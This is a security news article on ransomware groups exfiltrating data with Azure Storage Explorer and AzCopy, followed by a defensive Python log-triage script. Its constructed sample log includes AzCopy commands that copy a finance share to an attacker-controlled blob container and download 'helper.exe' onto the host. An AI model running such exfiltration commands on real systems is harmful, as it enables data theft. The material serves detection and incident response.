Legitimate traffic becomes the perfect cover for attacks.
Security researchers at modePUSH recently discovered that ransomware groups such as BianLian and Rhysida are actively using Microsoft's Azure Storage Explorer and AzCopy tools to steal data from compromised networks and then store it in Azure Blob Storage.
Storage Explorer is a graphical management tool for Azure, while AzCopy is a command-line utility for migrating data to the cloud at scale. Using these tools, the criminals upload stolen data to an Azure Blob container under their control, from where they can easily move it to other storage.
modePUSH experts noted that in order to run Azure Storage Explorer, the attackers had to install additional dependencies and upgrade .NET to version 8 on the compromised hosts. That they go to this trouble underscores the growing focus on data theft in ransomware operations, where the stolen information becomes the main leverage in the subsequent extortion phase.
While each ransomware group uses its own tools to exfiltrate data, Azure attracts attackers because of its reputation as an enterprise service. Since it is widely used in many companies, its traffic is less likely to be blocked by corporate firewalls and security systems, which greatly simplifies data transfer.
In addition, Azure is highly scalable and performant, which is especially useful when large volumes of files need to be transferred quickly. modePUSH experts also noticed that the criminals run multiple instances of Azure Storage Explorer at once to speed up the upload of data into the Blob container.
Researchers found that when using AzCopy and Storage Explorer, the attackers leave the default "Info" logging level enabled, so AzCopy writes a record of every operation to a log file (by default under the .azcopy folder in the user's profile). This file lets incident responders quickly identify what data was stolen and what files may have been downloaded onto the victims' devices.
To protect yourself, we recommend monitoring for AzCopy execution, monitoring outbound traffic to Azure Blob Storage endpoints, and setting alerts when unusual copying or file-access activity is detected on key servers. Organizations that already use Azure Storage Explorer should enable its option to sign out automatically when the application is closed, so that attackers cannot reuse an active session to steal data.
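The two paragraphs above describe a forensic artifact (the AzCopy log) and a detection idea (flag copies to storage accounts nobody approved). The script below is an added example and not modePUSH's tooling or Microsoft's: it parses a constructed, simplified AzCopy-like log, reconstructs which files were uploaded, which failed and which were pulled down onto the host, masks any SAS signature recorded on the Job-Command line (that token may still be valid and should be treated as a leaked credential), and raises an alert when successful uploads went to a storage account outside an allowlist. The sample lines, the `acct7721` account, the `FS01` share and the `helper.exe` file are all made up; the regexes are written for this constructed layout and must be adapted to the real log format before use.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Constructed sample (assumption, not a real AzCopy log): one Job-Command line per job,
# then one DONE line per transferred file. Real logs are written by default under
# %USERPROFILE%\.azcopy on Windows and ~/.azcopy on Linux/macOS; adapt the regexes to them.
SAMPLE_LOG = r"""
2024/09/10 03:12:41 AzcopyVersion 10.25.1
2024/09/10 03:12:41 OS-Environment windows
2024/09/10 03:12:41 Job-Command copy \\FS01\Finance https://acct7721.blob.core.windows.net/stage?sv=2023-01-03&sig=Q2xlYXJseUZha2U --recursive --log-level=INFO
2024/09/10 03:12:43 INFO: [P#0-T#0] DONE with transfer: \\FS01\Finance\payroll_2024.xlsx -> https://acct7721.blob.core.windows.net/stage/payroll_2024.xlsx, status UPLOADSUCCESSFUL
2024/09/10 03:12:44 INFO: [P#0-T#1] DONE with transfer: \\FS01\Finance\contracts\acme.pdf -> https://acct7721.blob.core.windows.net/stage/contracts/acme.pdf, status UPLOADSUCCESSFUL
2024/09/10 03:12:45 INFO: [P#0-T#2] DONE with transfer: \\FS01\Finance\locked.docx -> https://acct7721.blob.core.windows.net/stage/locked.docx, status FAILED
2024/09/10 03:20:02 Job-Command copy https://acct7721.blob.core.windows.net/tools/helper.exe C:\Temp\helper.exe
2024/09/10 03:20:03 INFO: [P#0-T#0] DONE with transfer: https://acct7721.blob.core.windows.net/tools/helper.exe -> C:\Temp\helper.exe, status DOWNLOADSUCCESSFUL
"""

TS = r"(?P<ts>\d{4}/\d\d/\d\d \d\d:\d\d:\d\d)"
DONE_RE = re.compile(TS + r" INFO: \[P#\d+-T#\d+\] DONE with transfer: "
                     r"(?P<src>.+?) -> (?P<dst>.+?), status (?P<status>[A-Z]+)$")
JOB_RE = re.compile(TS + r" Job-Command (?P<cmd>.+)$")
SIG_RE = re.compile(r"(sig=)[^&\s]+")          # SAS signature query parameter


@dataclass(frozen=True)
class Transfer:
    ts: str
    src: str
    dst: str
    status: str

    @property
    def direction(self) -> str:
        # A blob URL on the destination side means data left the host (exfiltration);
        # a blob URL on the source side means a file was pulled down onto it.
        return "upload" if self.dst.startswith("https://") else "download"

    @property
    def account(self) -> Optional[str]:
        url = self.dst if self.direction == "upload" else self.src
        host = urlparse(url).hostname or ""
        return host.split(".")[0] if host.endswith(".blob.core.windows.net") else None


def parse_transfers(log_text: str) -> list:
    """Return one Transfer per DONE line in the log."""
    out = []
    for line in log_text.splitlines():
        m = DONE_RE.match(line.strip())
        if m:
            out.append(Transfer(**m.groupdict()))
    return out


def job_commands(log_text: str) -> list:
    """Job-Command lines with any SAS signature masked before they go into a report."""
    cmds = []
    for line in log_text.splitlines():
        m = JOB_RE.match(line.strip())
        if m:
            cmds.append(SIG_RE.sub(r"\1<masked>", m.group("cmd")))
    return cmds


def triage(transfers: list, allowed_accounts: set) -> dict:
    """Summarise what was taken, what failed, what came in, and whether to alert."""
    def ok(t: Transfer) -> bool:
        return t.status.endswith("SUCCESSFUL")

    uploads = [t for t in transfers if t.direction == "upload" and ok(t)]
    downloads = [t for t in transfers if t.direction == "download" and ok(t)]
    accounts = {t.account for t in transfers if t.account}
    unknown = accounts - set(allowed_accounts)
    return {
        "exfiltrated": sorted(t.src for t in uploads),
        "failed": sorted(t.src for t in transfers if not ok(t)),
        "downloaded": sorted(t.dst for t in downloads),
        "accounts": sorted(accounts),
        "unknown_accounts": sorted(unknown),
        # Alert only when data actually reached a storage account nobody approved.
        "alert": any(t.account in unknown for t in uploads),
    }


if __name__ == "__main__":
    # "corpbackup01" is a hypothetical approved account; acct7721 is not on the list.
    report = triage(parse_transfers(SAMPLE_LOG), allowed_accounts={"corpbackup01"})
    for key, value in report.items():
        print(f"{key}: {value}")
    for cmd in job_commands(SAMPLE_LOG):
        print("job:", cmd)
```

The allowlist is the operational part: every storage account the business legitimately copies to goes into `allowed_accounts`, and anything else seen as an upload destination in an AzCopy log (or in proxy logs for `*.blob.core.windows.net`) is worth an alert. Failed transfers are reported separately because a file that never left the network changes the breach-notification picture.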
Source